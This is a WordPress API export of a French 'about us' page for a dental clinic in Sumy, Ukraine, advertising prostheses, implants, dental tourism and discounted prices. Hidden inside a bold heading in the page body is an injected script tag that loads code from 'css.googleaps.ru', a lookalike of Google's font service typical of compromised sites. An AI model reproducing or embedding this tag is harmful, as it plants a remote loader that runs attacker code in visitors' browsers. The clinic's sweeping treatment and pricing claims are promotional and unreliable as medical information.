{"id":3717,"date":"2014-01-20T15:28:12","date_gmt":"2014-01-20T13:28:12","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3717"},"modified":"2014-02-28T10:44:27","modified_gmt":"2014-02-28T08:44:27","slug":"qui-sommes-nous","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/fr","title":{"rendered":"Qui sommes-nous"},"content":{"rendered":"<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg\" rel=\"prettyPhoto[3717]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4140\" alt=\"Advantages of our dental clinic\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg\" width=\"300\" height=\"199\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-630x418.jpg 630w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-900x598.jpg 900w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Les avantages de notre clinique dentaire:<\/b><\/p>\n<ul>\n<li>Une large gamme de soins dentaires.<\/li>\n<li>Les traitements dentaires sans fraise dentaire (La technologie danoise Sandman).<\/li>\n<li>L&rsquo;anesth\u00e9sie comput\u00e9ris\u00e9e (l&rsquo;anesth\u00e9sie de dents en utilisant des syst\u00e8mes d&rsquo;anesth\u00e9sie de la nanotechnologie).<\/li>\n<li>L&rsquo;anesth\u00e9sie de dents sans l&rsquo;utilisation d&rsquo;une seringue (La technologie allemande INJEX).<\/li>\n<li>Le diagnostic radiographique.<\/li>\n<li>Les proth\u00e8ses amovibles sans meulage des dents saines.<\/li>\n<li>Les proth\u00e8ses sur implants (prix abordable et \u201dd\u00e9mocratique\u201d).<\/li>\n<li>Les strictes normes en mati\u00e8re d&rsquo;hygi\u00e8ne et de st\u00e9rilisation hospitali\u00e8re (Anti-SIDA, anti &#8211; h\u00e9patite).<\/li>\n<li>Une consultation gratuite.<\/li>\n<li>Nos d\u00e9lais de r\u00e9alisation des proth\u00e8ses est le plus rapide dans la r\u00e9gion.<\/li>\n<li>Une grande exp\u00e9rience professionnelle des praticiens.<\/li>\n<li>La garantie de chaque construction que nous avons install\u00e9e.<\/li>\n<li>La politique des prix est flexible (nos m\u00e9decins peuvent vous offrir toute gamme de constructions (de bas gamme jusqu\u2019aux constructions les plus ch\u00e8res de VIP-classe) adapt\u00e9es aux besoins et au budget de chaque patient).<\/li>\n<li>Les soins dentaires \u00e0 temp\u00e9rament.<\/li>\n<li>Les proth\u00e8ses et le traitement sont effectu\u00e9s par l&rsquo;assurance (Si vous \u00eates assur\u00e9s \u00e0 la compagnie d&rsquo;assurance et votre assurance couvre les soins dentaires.).<\/li>\n<li>Les Luminiers de\u00a0Hollywood (Un soin unique pour les clients VIP).<\/li>\n<li>COMPONEER est la technologie suisse unique de restauration dentaire (la nouveaut\u00e9 de 2012).<\/li>\n<li>Les facettes dentaires en jour.<\/li>\n<li>Le laboratoire dentaire priv\u00e9.<\/li>\n<li>Le programme d&rsquo;escompte.<\/li>\n<li>La faisabilit\u00e9 de la proth\u00e8se dentaire de toute modification.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg\" rel=\"prettyPhoto[3717]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4141\" alt=\"Dental prosthesis in Sumy city\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg\" width=\"300\" height=\"241\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Les proth\u00e8ses dentaires dans la ville de Sumy<\/b><\/p>\n<p>Dans notre clinique dentaire les m\u00e9decins font \u00a0toutes les modifications existantes de proth\u00e8ses. Si vous avez une situation tr\u00e8s compliqu\u00e9e et lanc\u00e9e, il n&rsquo;y a absolument aucune raison pour vous inqui\u00e9ter. Nous allons vous aider \u00e0 r\u00e9soudre les situations les plus difficiles.<\/p>\n<p>Ceux qui veulent ins\u00e9rer les dents doivent \u00eatre consult\u00e9s \u00e0 l\u2019aide de \u00a0la forme de chat en ligne (fen\u00eatre en incrustation sur le site Web\u00a0: <a href=\"https:\/\/www.your-brilliant-smile.com\/\">www.your-brilliant-smile.com<\/a>) ou t\u00e9l\u00e9phoner\u00a0 (notre num\u00e9ro de t\u00e9l\u00e9phone\u00a0 +3 8\u00a0066\u00a0196 87 93). \u00a0Puis pr\u00e9-inscrivez-vous\u00a0 \u00e0 l\u2019examen (l\u2019examen initial est gratuit). D\u00e8s que vous serez familiaris\u00e9s avec toutes les solutions possibles pour votre situation et choisissez la conception optimale, on peut commencer \u00e0 faire des proth\u00e8ses de dents.<b> <\/b><\/p>\n<p>Notre clinique dentaire fabrique des proth\u00e8ses plus rapide que les autres (en 3 \u2013 7 jours).<\/p>\n<p>Nous appelons les productions \u00e9lites de \u00a0la classe VIP\u00a0 dans les laboratoires dentaires \u00e0 Kiev, en Europe (Allemagne, Suisse), par cons\u00e9quent le d\u00e9lai de fabrication des proth\u00e8ses dentaires sera plus longue, mais avec la qualit\u00e9 sup\u00e9rieure.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg\" rel=\"prettyPhoto[3717]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4142\" alt=\"Dental tourism in Ukraine\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Le tourisme dentaire en Ukraine. Ou pourquoi vous devriez nous demander des soins dentaires.<\/b><\/p>\n<p>En ces temps derniers dans le monde entier on peut trouver plus souvent une nouvelle tendance du tourisme, telle comme Le Tourisme dentaire. Vous pouvez \u00e9conomiser beaucoup de votre argent et votre temps, plus voir l&rsquo;Ukraine, visiter les tours, et consacrer peu de temps pour la sant\u00e9.<\/p>\n<p>Nous invitons les gens de tous les pays \u00e0 arriver chez nous \u00e0 Sumy et \u00e0 visiter notre clinique dentaire. Vous pouvez consulter un sp\u00e9cialiste qualifi\u00e9 en nous envoyant un e-mail \u00e0 notre adresse e-mail (<a href=\"mailto:katsumoto2018@gmail.com\">katsumoto2018@gmail.com<\/a>) ou \u00a0contacter nous en mode en ligne par le Chat en ligne. La solution id\u00e9ale est de nous envoyer un e-mail avec votre clich\u00e9 radiographique panoramique, nous pouvons vous conseiller plus pr\u00e9cis\u00e9ment et calculer le co\u00fbt des travaux avant de commencer. Nous nous occupons de tous les aspects organisationnels. Nous allons vous aider \u00e0 choisir le lieu de r\u00e9sidence temporaire (appartement ou h\u00f4tel). L&rsquo;h\u00f4tel 4 \u00e9toiles est le plus proche de notre clinique. Il se trouve \u00e0 500 m\u00e8tres de nous. Nous tenons \u00e0 vous aider \u00e0 organiser vos loisirs, \u00e0 trouver les meilleures excursions de notre ville, des lieux c\u00e9l\u00e8bres dans l&rsquo;histoire de notre r\u00e9gion et de la capitale de notre pays Kyiv.<\/p>\n<p>La dentisterie est en grande demande parmi la population. Dans notre r\u00e9gion il y a beaucoup de cliniques et de cabinets dentaires, mais chaque m\u00e9decin exploite \u00e0 la m\u00eame situation diff\u00e9remment. Quelqu&rsquo;un rend le traitement et les proth\u00e8ses plus doux pour le patient, quelqu&rsquo;un le fait bien au contraire et il est impossible de juger quiconque. Nous sommes tous diff\u00e9rents. Nous avons les diff\u00e9rentes approches. Nous utilisons aussi les technologies et les croyances diverses. Les principes de l&rsquo;approche de la r\u00e9habilitation des patients des m\u00e9decins de notre clinique se distinguent des autres. Nous suivons la voie de la moindre intervention (si cela est possible en indication), la rationalit\u00e9, la st\u00e9rilit\u00e9 et sans douleur. Nous faisons tous les traitements et les proth\u00e8ses de dents sous anesth\u00e9sie (le plus souvent, nous utilisons le syst\u00e8me allemand INJEX, il nous permet de faire l&rsquo;anesth\u00e9sie de dents sans l&rsquo;utilisation d&rsquo;une seringue).<\/p>\n<p>Nous faisons les proth\u00e8ses dentaires selon le sch\u00e8me individuel (\u00e0 l&rsquo;aide de l&rsquo;arcade zygomatique et l&rsquo;articulateur, en tenant compte des donn\u00e9es de votre conjoint et des donn\u00e9es anthropom\u00e9triques). Le sch\u00e8me individuel permet de faire les proth\u00e8ses dentaires plus pr\u00e9cise et plus confortable pour le patient en compte tenu non seulement de la forme, mais encore de la structure de l&rsquo;articulation et des angles de mouvement (r\u00e9f\u00e9rence) des dents. Le r\u00e9sultat de ce travail sera atterrant.<\/p>\n<p><strong>Nous vous proposons une grande vari\u00e9t\u00e9 de proth\u00e8ses en fonction de vos besoins:<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/strong><\/p>\n<ul>\n<li>Les proth\u00e8ses partielles (les proth\u00e8ses partielles avec des attachements invisibles, les proth\u00e8ses partielles classiques, les proth\u00e8ses partielles avec la fixation du syst\u00e8me t\u00e9lescopique,\u00a0 les proth\u00e8ses partielles de fixation au tissu mou, \u00a0les proth\u00e8ses partielles avec la fixation du syst\u00e8me \u00e0 poutres).<\/li>\n<li>Les proth\u00e8ses gr\u00e2ce \u00e0 la technologie c\u00e9ramique non m\u00e9tallique.<\/li>\n<li>Les proth\u00e8ses gr\u00e2ce \u00e0 la technologie c\u00e9ramom\u00e9tallique.<\/li>\n<li>Les Luminiers.<\/li>\n<li>Les COMPONEERs.<\/li>\n<li>Les facettes dentaires.<\/li>\n<li>Les proth\u00e8ses sur implants.<\/li>\n<li>Les proth\u00e8ses amovibles (les proth\u00e8ses\u00a0 chevauchants, les proth\u00e8ses\u00a0 lamelleux, les proth\u00e8ses provisoires amovibles).<\/li>\n<li>La couronne de plastique temporaire, les microproth\u00e8ses.<\/li>\n<li>Les microproth\u00e8ses de dents utilisant les encartages et les couvre-joints.<\/li>\n<\/ul>\n<p><b>Le traitement dentaire<\/b> dans notre clinique n&rsquo;est tenu que par les technologies les plus modernes. Nous plombons les dents seulement du c\u00e9ment ionom\u00e8re de verre et des composites photopolym\u00e8res qui sont fabriqu\u00e9s en Allemagne , au Japon et aux \u00c9tats-Unis. Nous traitons les canaux des racines des dents \u00e0 l&rsquo;aide d&rsquo;Endomotor(dispositif qui permet d&rsquo;agrandir les canaux radiculaires jusqu&rsquo;\u00e0\u00a0 la largeur n\u00e9cessaire) suivi de comblement du canal de la racine de la dent par la gutta-percha chauff\u00e9e et le joint de ciment r\u00e9paratrice sp\u00e9ciale.<\/p>\n<p>Dans certains cas graves, le traitement est effectu\u00e9 en utilisant une digue dentaire Raberdam (avec isolation d&rsquo;une ou de plusieurs dents du reste de la cavit\u00e9 buccale). On peut fraiser une dent sans utilisation de la fraise (cette technologie permet de retirer les tissus malades de la dent par un dispositif sp\u00e9cial qui souffle au pied de la lettre le tissu affect\u00e9 de la dent).<\/p>\n<p>Nous traitons <b>les maladies des gencives<\/b> (les parodontites, les parodontoses, les gingivites) en utilisant une diode laser \u00ab\u00a0Biolase\u00a0\u00bb. Cette technologie contribue l&rsquo;impact effectif antiseptique sur les parost\u00e9als l\u00e9s\u00e9s. Le Curettage (brossage des cuissons parodontosiques contre le tissu de granulation) r\u00e9alis\u00e9 en utilisant un laser est beaucoup plus efficace que les proc\u00e9dures standards, et a une bonne et rapide cicatrisation. Presque toutes les maladies connues des parost\u00e9als peuvent \u00eatre gu\u00e9rir en 3 \u2013 5 proc\u00e9d\u00e9s.<\/p>\n<p><b>Le diagnostic radiographique.<\/b><\/p>\n<p>Gr\u00e2ce \u00e0 propre dispositif radiographique nous pouvons d\u00e9tecter plus parfaitement les maladies du syst\u00e8me dentaire. Dans certains cas, nous avons besoin d&rsquo;un clich\u00e9 dans les \u00e9tapes interm\u00e9diaires de traitement.<\/p>\n<p><b>La stomatologie laser<\/b><\/p>\n<p>Le laser nous permet de r\u00e9aliser les soins dentaires tels comme\u00a0: l&rsquo;implantation laser des dents, le blanchissement laser des dents, le raccourcissement du frein de la langue, le r\u00e9cessus de l&rsquo;atrium de la vacuit\u00e9 de la bouche, le traitement des maladies du parodonte, l&rsquo;oblit\u00e9ration du canal fistuleux, le traitement des p\u00e9ricoronarites.<\/p>\n<p><b>Les traitements dentaires sans fraise dentaire<\/b><\/p>\n<p><b>Le traitement et les proth\u00e8ses sous grossissement<\/b><\/p>\n<p><b>La chirurgie dentaire<\/b><\/p>\n<p>L&rsquo;arrachement des dents de toute la complexit\u00e9, la parodontie chirurgicales, la cystectomie, l&rsquo;arrachement des n\u00e9oformations, l&rsquo;excision des freins de la langue, le r\u00e9cessus de l&rsquo;atrium de la vacuit\u00e9 de la bouche, l&rsquo;implantation, les comblements ost\u00e9iques.<\/p>\n<p><b>La d\u00e9coration des dents<\/b><\/p>\n<p>L&rsquo;incrustation des dents par des Skies, strass et pierres fines.<\/p>\n<p><b>La gnathologie<\/b><\/p>\n<p>La consultation du gnathologue, le diagnostic des maladies de l&rsquo;articulation temporo-mandibulaire, le diagnostic et le r\u00e9ajustage des violations occlusifs \u00e0 l&rsquo;aide de l&rsquo;articulateur et le broyage s\u00e9lectif des dents. La fabrication des prot\u00e8ge-dents \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 face \u00e0 la brycomanie, l&rsquo;abrasion pathologique des dents. La fabrication des prot\u00e8ge-dents avec de vastes proth\u00e8ses. Les prot\u00e8ge-dents de relaxation. Les prot\u00e8ge-dents repositionn\u00e9s.<\/p>\n<p><b>Les soins dentaires pour les femmes enceintes<\/b><\/p>\n<p>Dans notre clinique, nous utilisons des techniques plus douces de traitement et de proth\u00e8ses pour les femmes enceintes. Pour eux, nous avons les m\u00e9dicaments et les p\u00e2tes d&rsquo;obturation les plus inoffensifs et certifi\u00e9s.<\/p>\n<p><b>Les implants dentaires<\/b><\/p>\n<p>Nous pr\u00eatons beaucoup d&rsquo;attention \u00e0 l&rsquo;implantation dentaire dans notre clinique. Tous les travaux sur les proth\u00e8ses sur implants se d\u00e9roulent selon le sch\u00e8me individuel r\u00e9pondant aux particularit\u00e9s individuelles de la structure de l&rsquo;occlusion et l&rsquo;articulation temporo-mandibulaire. Cette ligne de proth\u00e8se de d\u00e9ficiences dentaires est l&rsquo;une des plus \u00e9volutifs dans notre temps. Nous travaillons uniquement avec les syst\u00e8mes d&rsquo;implants fiables qui sont fabriqu\u00e9s en Allemagne, aux \u00c9tats-Unis et en Isra\u00ebl.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg\" rel=\"prettyPhoto[3717]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4143\" alt=\"New action offers\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg\" width=\"300\" height=\"160\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg 595w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Nouvelles propositions de l\u2019action de notre clinique dentaire<\/b><\/p>\n<p><b><\/b>1. Le plombage<b> <\/b>photopolym\u00e8re FILTEK Z550\u00a0(les USA) est seulement 200 hryvnia (le photopolym\u00e8re c\u2019est\u00a0 un des p\u00e2tes d&rsquo;obturation plus fermes et effac\u00e9s, il ne s&rsquo;estompe pas, il n\u2019a pas de microfissures et surtout, qu&rsquo;il peut \u00eatre adapt\u00e9 \u00e0 n&rsquo;importe quelle couleur de la dent (il n\u2019y a aucune diff\u00e9rence entre le plombage et la dent). Pourquoi \u00e7a co\u00fbte 200 hryvnia. Est-ce que c\u2019est cher? Le co\u00fbt moyen de tels plombages dans les cliniques de Kyiv, Kharkiv, Lviv est de 350 \u00e0 400 hryvnia. ).<\/p>\n<p>2. Les proth\u00e8ses dentaires. Les facettes IPS EMAX\u00a0 (Allemand) ne co\u00fbte que 1000 hryvnia. Qu\u2019est-ce que c\u2019est une facette dentaire? Les facettes dentaires sont les minces plaques de c\u00e9ramique qui vous permettent de changer la couleur et la forme des dents. Si vous avez les dents courbes, c\u2019est une excellente alternative de boitiers. Si vous voulez avoir les dents parfaites pour toujours, les facettes dentaires sont \u00e9galement pour vous. Pourquoi nous utilisons les facettes de la compagnie IPS EMAX\u00a0 (Allemand) et pas d\u2019une autre? IPS EMAX\u00a0est la technologie la plus \u00e9prouv\u00e9e et biocompatible, ces facettes ont l&rsquo;air si naturel que personne ne pense jamais que c&rsquo;est les dents artificielles. Cette technologie est adopt\u00e9e et approuv\u00e9e dans le monde entier et aussi certifi\u00e9e en Ukraine. Pourquoi 1000 hryvnia ce n\u2019est pas cher? Le co\u00fbt moyen de telles facettes dentaires dans la ville de Sumy est environ 2000 hryvnia. En Europe \u00e7a co\u00fbte de \u20ac 1000 pour une unit\u00e9, et \u00e0 Kyiv &#8211; 3500 &#8211; 4000 hryvnia.<\/p>\n<p>3. La technologie c\u00e9ramom\u00e9tallique VitaVM13 (Allemand) est de 650 hryvnia. VitaVM13 (Allemand) c\u2019est un mat\u00e9riau qui n&rsquo;a pas d&rsquo;analogues sur l&rsquo;esth\u00e9tique et les caract\u00e9ristiques de r\u00e9sistance. Les couronnes c\u00e9ramom\u00e9tallique \u00a0faits de ce mat\u00e9riau semblent tr\u00e8s naturelles, car ce mat\u00e9riau vous donne l&rsquo;occasion de recr\u00e9er n&rsquo;importe quelle tonalit\u00e9, des\u00a0 nuances indiff\u00e9rentes, elles ont les propri\u00e9t\u00e9s fluorescentes et opalescentes. Le travail effectu\u00e9 de ce mat\u00e9riau, c\u2019est un travail d&rsquo;orf\u00e8vre. Le co\u00fbt moyen des travaux de tel mat\u00e9riau dentaires dans la ville de Sumy est environ 700 &#8211; 800 hryvnia pour une unit\u00e9.<\/p>\n<p>4. Le blanchissement laser des dents. Cette proc\u00e9dure co\u00fbte 1500 hryvnia. \u00c7a vous garantit le r\u00e9sultat parfait. Le blanchissement laser des dents ne provoque pas une augmentation de la sensibilit\u00e9 dans les dents. Il vous permet d&rsquo;obtenir le r\u00e9sultat n&rsquo;est pas une heure ou une semaine, et juste apr\u00e8s 20 minutes. Vous pouvez trouver cet appareil seulement dans notre clinique dentaire de la ville de Sumy. Le co\u00fbt moyen de la proc\u00e9dure du blanchissement laser des dents \u00a0\u00e0 Kyiv (en utilisant le m\u00eame laser et les trousses de blanchiment comme chez nous) est environ 3000 \u2013 4500 hryvnia.<\/p>\n<p>5. La technologie c\u00e9ramique non m\u00e9tallique. C&rsquo;est l&rsquo;esth\u00e9tique incomparable (les encartages, les couronnes et les facettes c\u00e9ramiques). L&rsquo;esth\u00e9tique maximale, au prix d&rsquo;action de 1000 hryvnia! Ancien prix est 2000 hryvnia! Si vous souhaitez obtenir un sourire \u00e9blouissant et la qualit\u00e9 parfaite des travaux, c&rsquo;est la meilleure option pour vous et vos amis <img decoding=\"async\" class=\"kws-smiley\" src=\"https:\/\/your-brilliant-smile.com\/wp-content\/plugins\/kama-wp-smile\/packs\/qip\/smile.gif\" alt=\"smile\" \/><\/p>\n<p>6. Les proth\u00e8ses dentaires \u00ab\u00a0Invisibles\u00a0\u00bb. Ce sont les constructions de verrouillage des attaches. Les proth\u00e8ses sur implants. Ces proth\u00e8ses sont absolument invisibles. Ils sont bien fix\u00e9s et ne vous mettront jamais dans une position inconfortable.<\/p>\n<p>7. Les soins dentaires pour les femmes enceintes. Cette section est tr\u00e8s diff\u00e9rente de l&rsquo;habitude des soins dentaires. Ici, il y a beaucoup de nuances. Il faut traiter avec une attention particuli\u00e8re et avec la sollicitude envers les femmes enceintes. Il faut \u00eatre tr\u00e8s prudent dans le choix des m\u00e9dicaments.<\/p>\n<p>8. Les proth\u00e8ses dentaires en acomptes jusqu\u2019\u00e0 un an.<\/p>\n<p>9. Les sp\u00e9cialistes avec nombreuses ann\u00e9es d&rsquo;exp\u00e9rience.<\/p>\n<p>10. La garantie de chaque construction que nous avons install\u00e9e. La garantie sur les proth\u00e8ses est 3 ans. La garantie pour le traitement &#8211; 1 an. Il ne faut pas confondre avec une garantie \u00e0 vie, ce sont les concepts diff\u00e9rents. La dur\u00e9e de vie est toujours plusieurs fois plus grande que la garantie. Les conditions g\u00e9n\u00e9rales du commencement du cas de garantie sont la cassure d&rsquo;un plombage ou d&rsquo;une proth\u00e8se, la chute d&rsquo;une dent. Nous sommes int\u00e9ress\u00e9s \u00e0 vous faire satisfait de la qualit\u00e9 de nos soins dentaires, C&rsquo;est pourquoi l&rsquo;observance du d\u00e9lai de garantie\u00a0 est une de nos r\u00e8gles imp\u00e9ratives.<\/p>\n<p>11. Les Luminiers de Hollywood. C&rsquo;est une technologie unique qui vous permet de cr\u00e9er des facettes dentaires ultraminces individuelles sans grincer des dents. (Dans la ville de Sumy rien d&rsquo;autre que notre clinique n&rsquo;est pas certifi\u00e9 par cette m\u00e9thode.)<\/p>\n<p>12. Les COMPONEERs (les facettes dentaires en une visite). Ce sont les facettes, qui sont produit de mat\u00e9riau composite press\u00e9e. L&rsquo;avantage de cette technique est qu&rsquo;elle peut \u00eatre effectu\u00e9e en une visite chez le dentiste. Une telle facette coute 1500 hryvnia dans notre clinique dentaire. (Dans la ville de Sumy rien d&rsquo;autre que notre clinique n&rsquo;est pas certifi\u00e9 par cette m\u00e9thode.)<\/p>\n<p>13. Nos d\u00e9lais de r\u00e9alisation des proth\u00e8ses est le plus rapide dans la r\u00e9gion (de 3\u00a0 \u00e0 5 jours).<\/p>\n<p>14. \u00ab\u00a0La possibilit\u00e9 de faire toutes modifications de la proth\u00e8se dentaire.\u00a0\u00bb Dans notre clinique, vous pouvez commander n&rsquo;importe quel type de proth\u00e8se dentaire. Nous faisons les proth\u00e8ses de toutes les techniques modernes existantes, et nous am\u00e9liorons constamment nos connaissances dans les s\u00e9minaires et les cours de ma\u00eetre pour apprendre des nouvelles techniques et possibilit\u00e9s.<\/p>\n<p>15. Le traitement et les proth\u00e8ses sous grossissement. (Le dentiste comme le bijoutier, en vue de mieux et de plus beau faire son travail, ne peut pas voir toutes les nuances sans grossissement \u00e0 3 ou 5 fois. Dans les cas o\u00f9 le patient a une des exigences esth\u00e9tiques \u00e9lev\u00e9es, nous utilisons appareils grossissants.)<\/p>\n<p>16. La dentisterie p\u00e9diatrique (Les traitements dentaires sans fraise dentaire).<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les avantages de notre clinique dentaire: Une large gamme de soins dentaires. Les traitements dentaires sans fraise dentaire (La technologie danoise Sandman). L&rsquo;anesth\u00e9sie comput\u00e9ris\u00e9e (l&rsquo;anesth\u00e9sie de dents en utilisant des syst\u00e8mes d&rsquo;anesth\u00e9sie de la nanotechnologie). L&rsquo;anesth\u00e9sie de dents sans l&rsquo;utilisation d&rsquo;une seringue (La technologie allemande INJEX). Le diagnostic radiographique. Les proth\u00e8ses amovibles sans meulage des [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/pages\/3717"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/comments?post=3717"}],"version-history":[{"count":3,"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/pages\/3717\/revisions"}],"predecessor-version":[{"id":4151,"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/pages\/3717\/revisions\/4151"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/fr\/wp-json\/wp\/v2\/media?parent=3717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}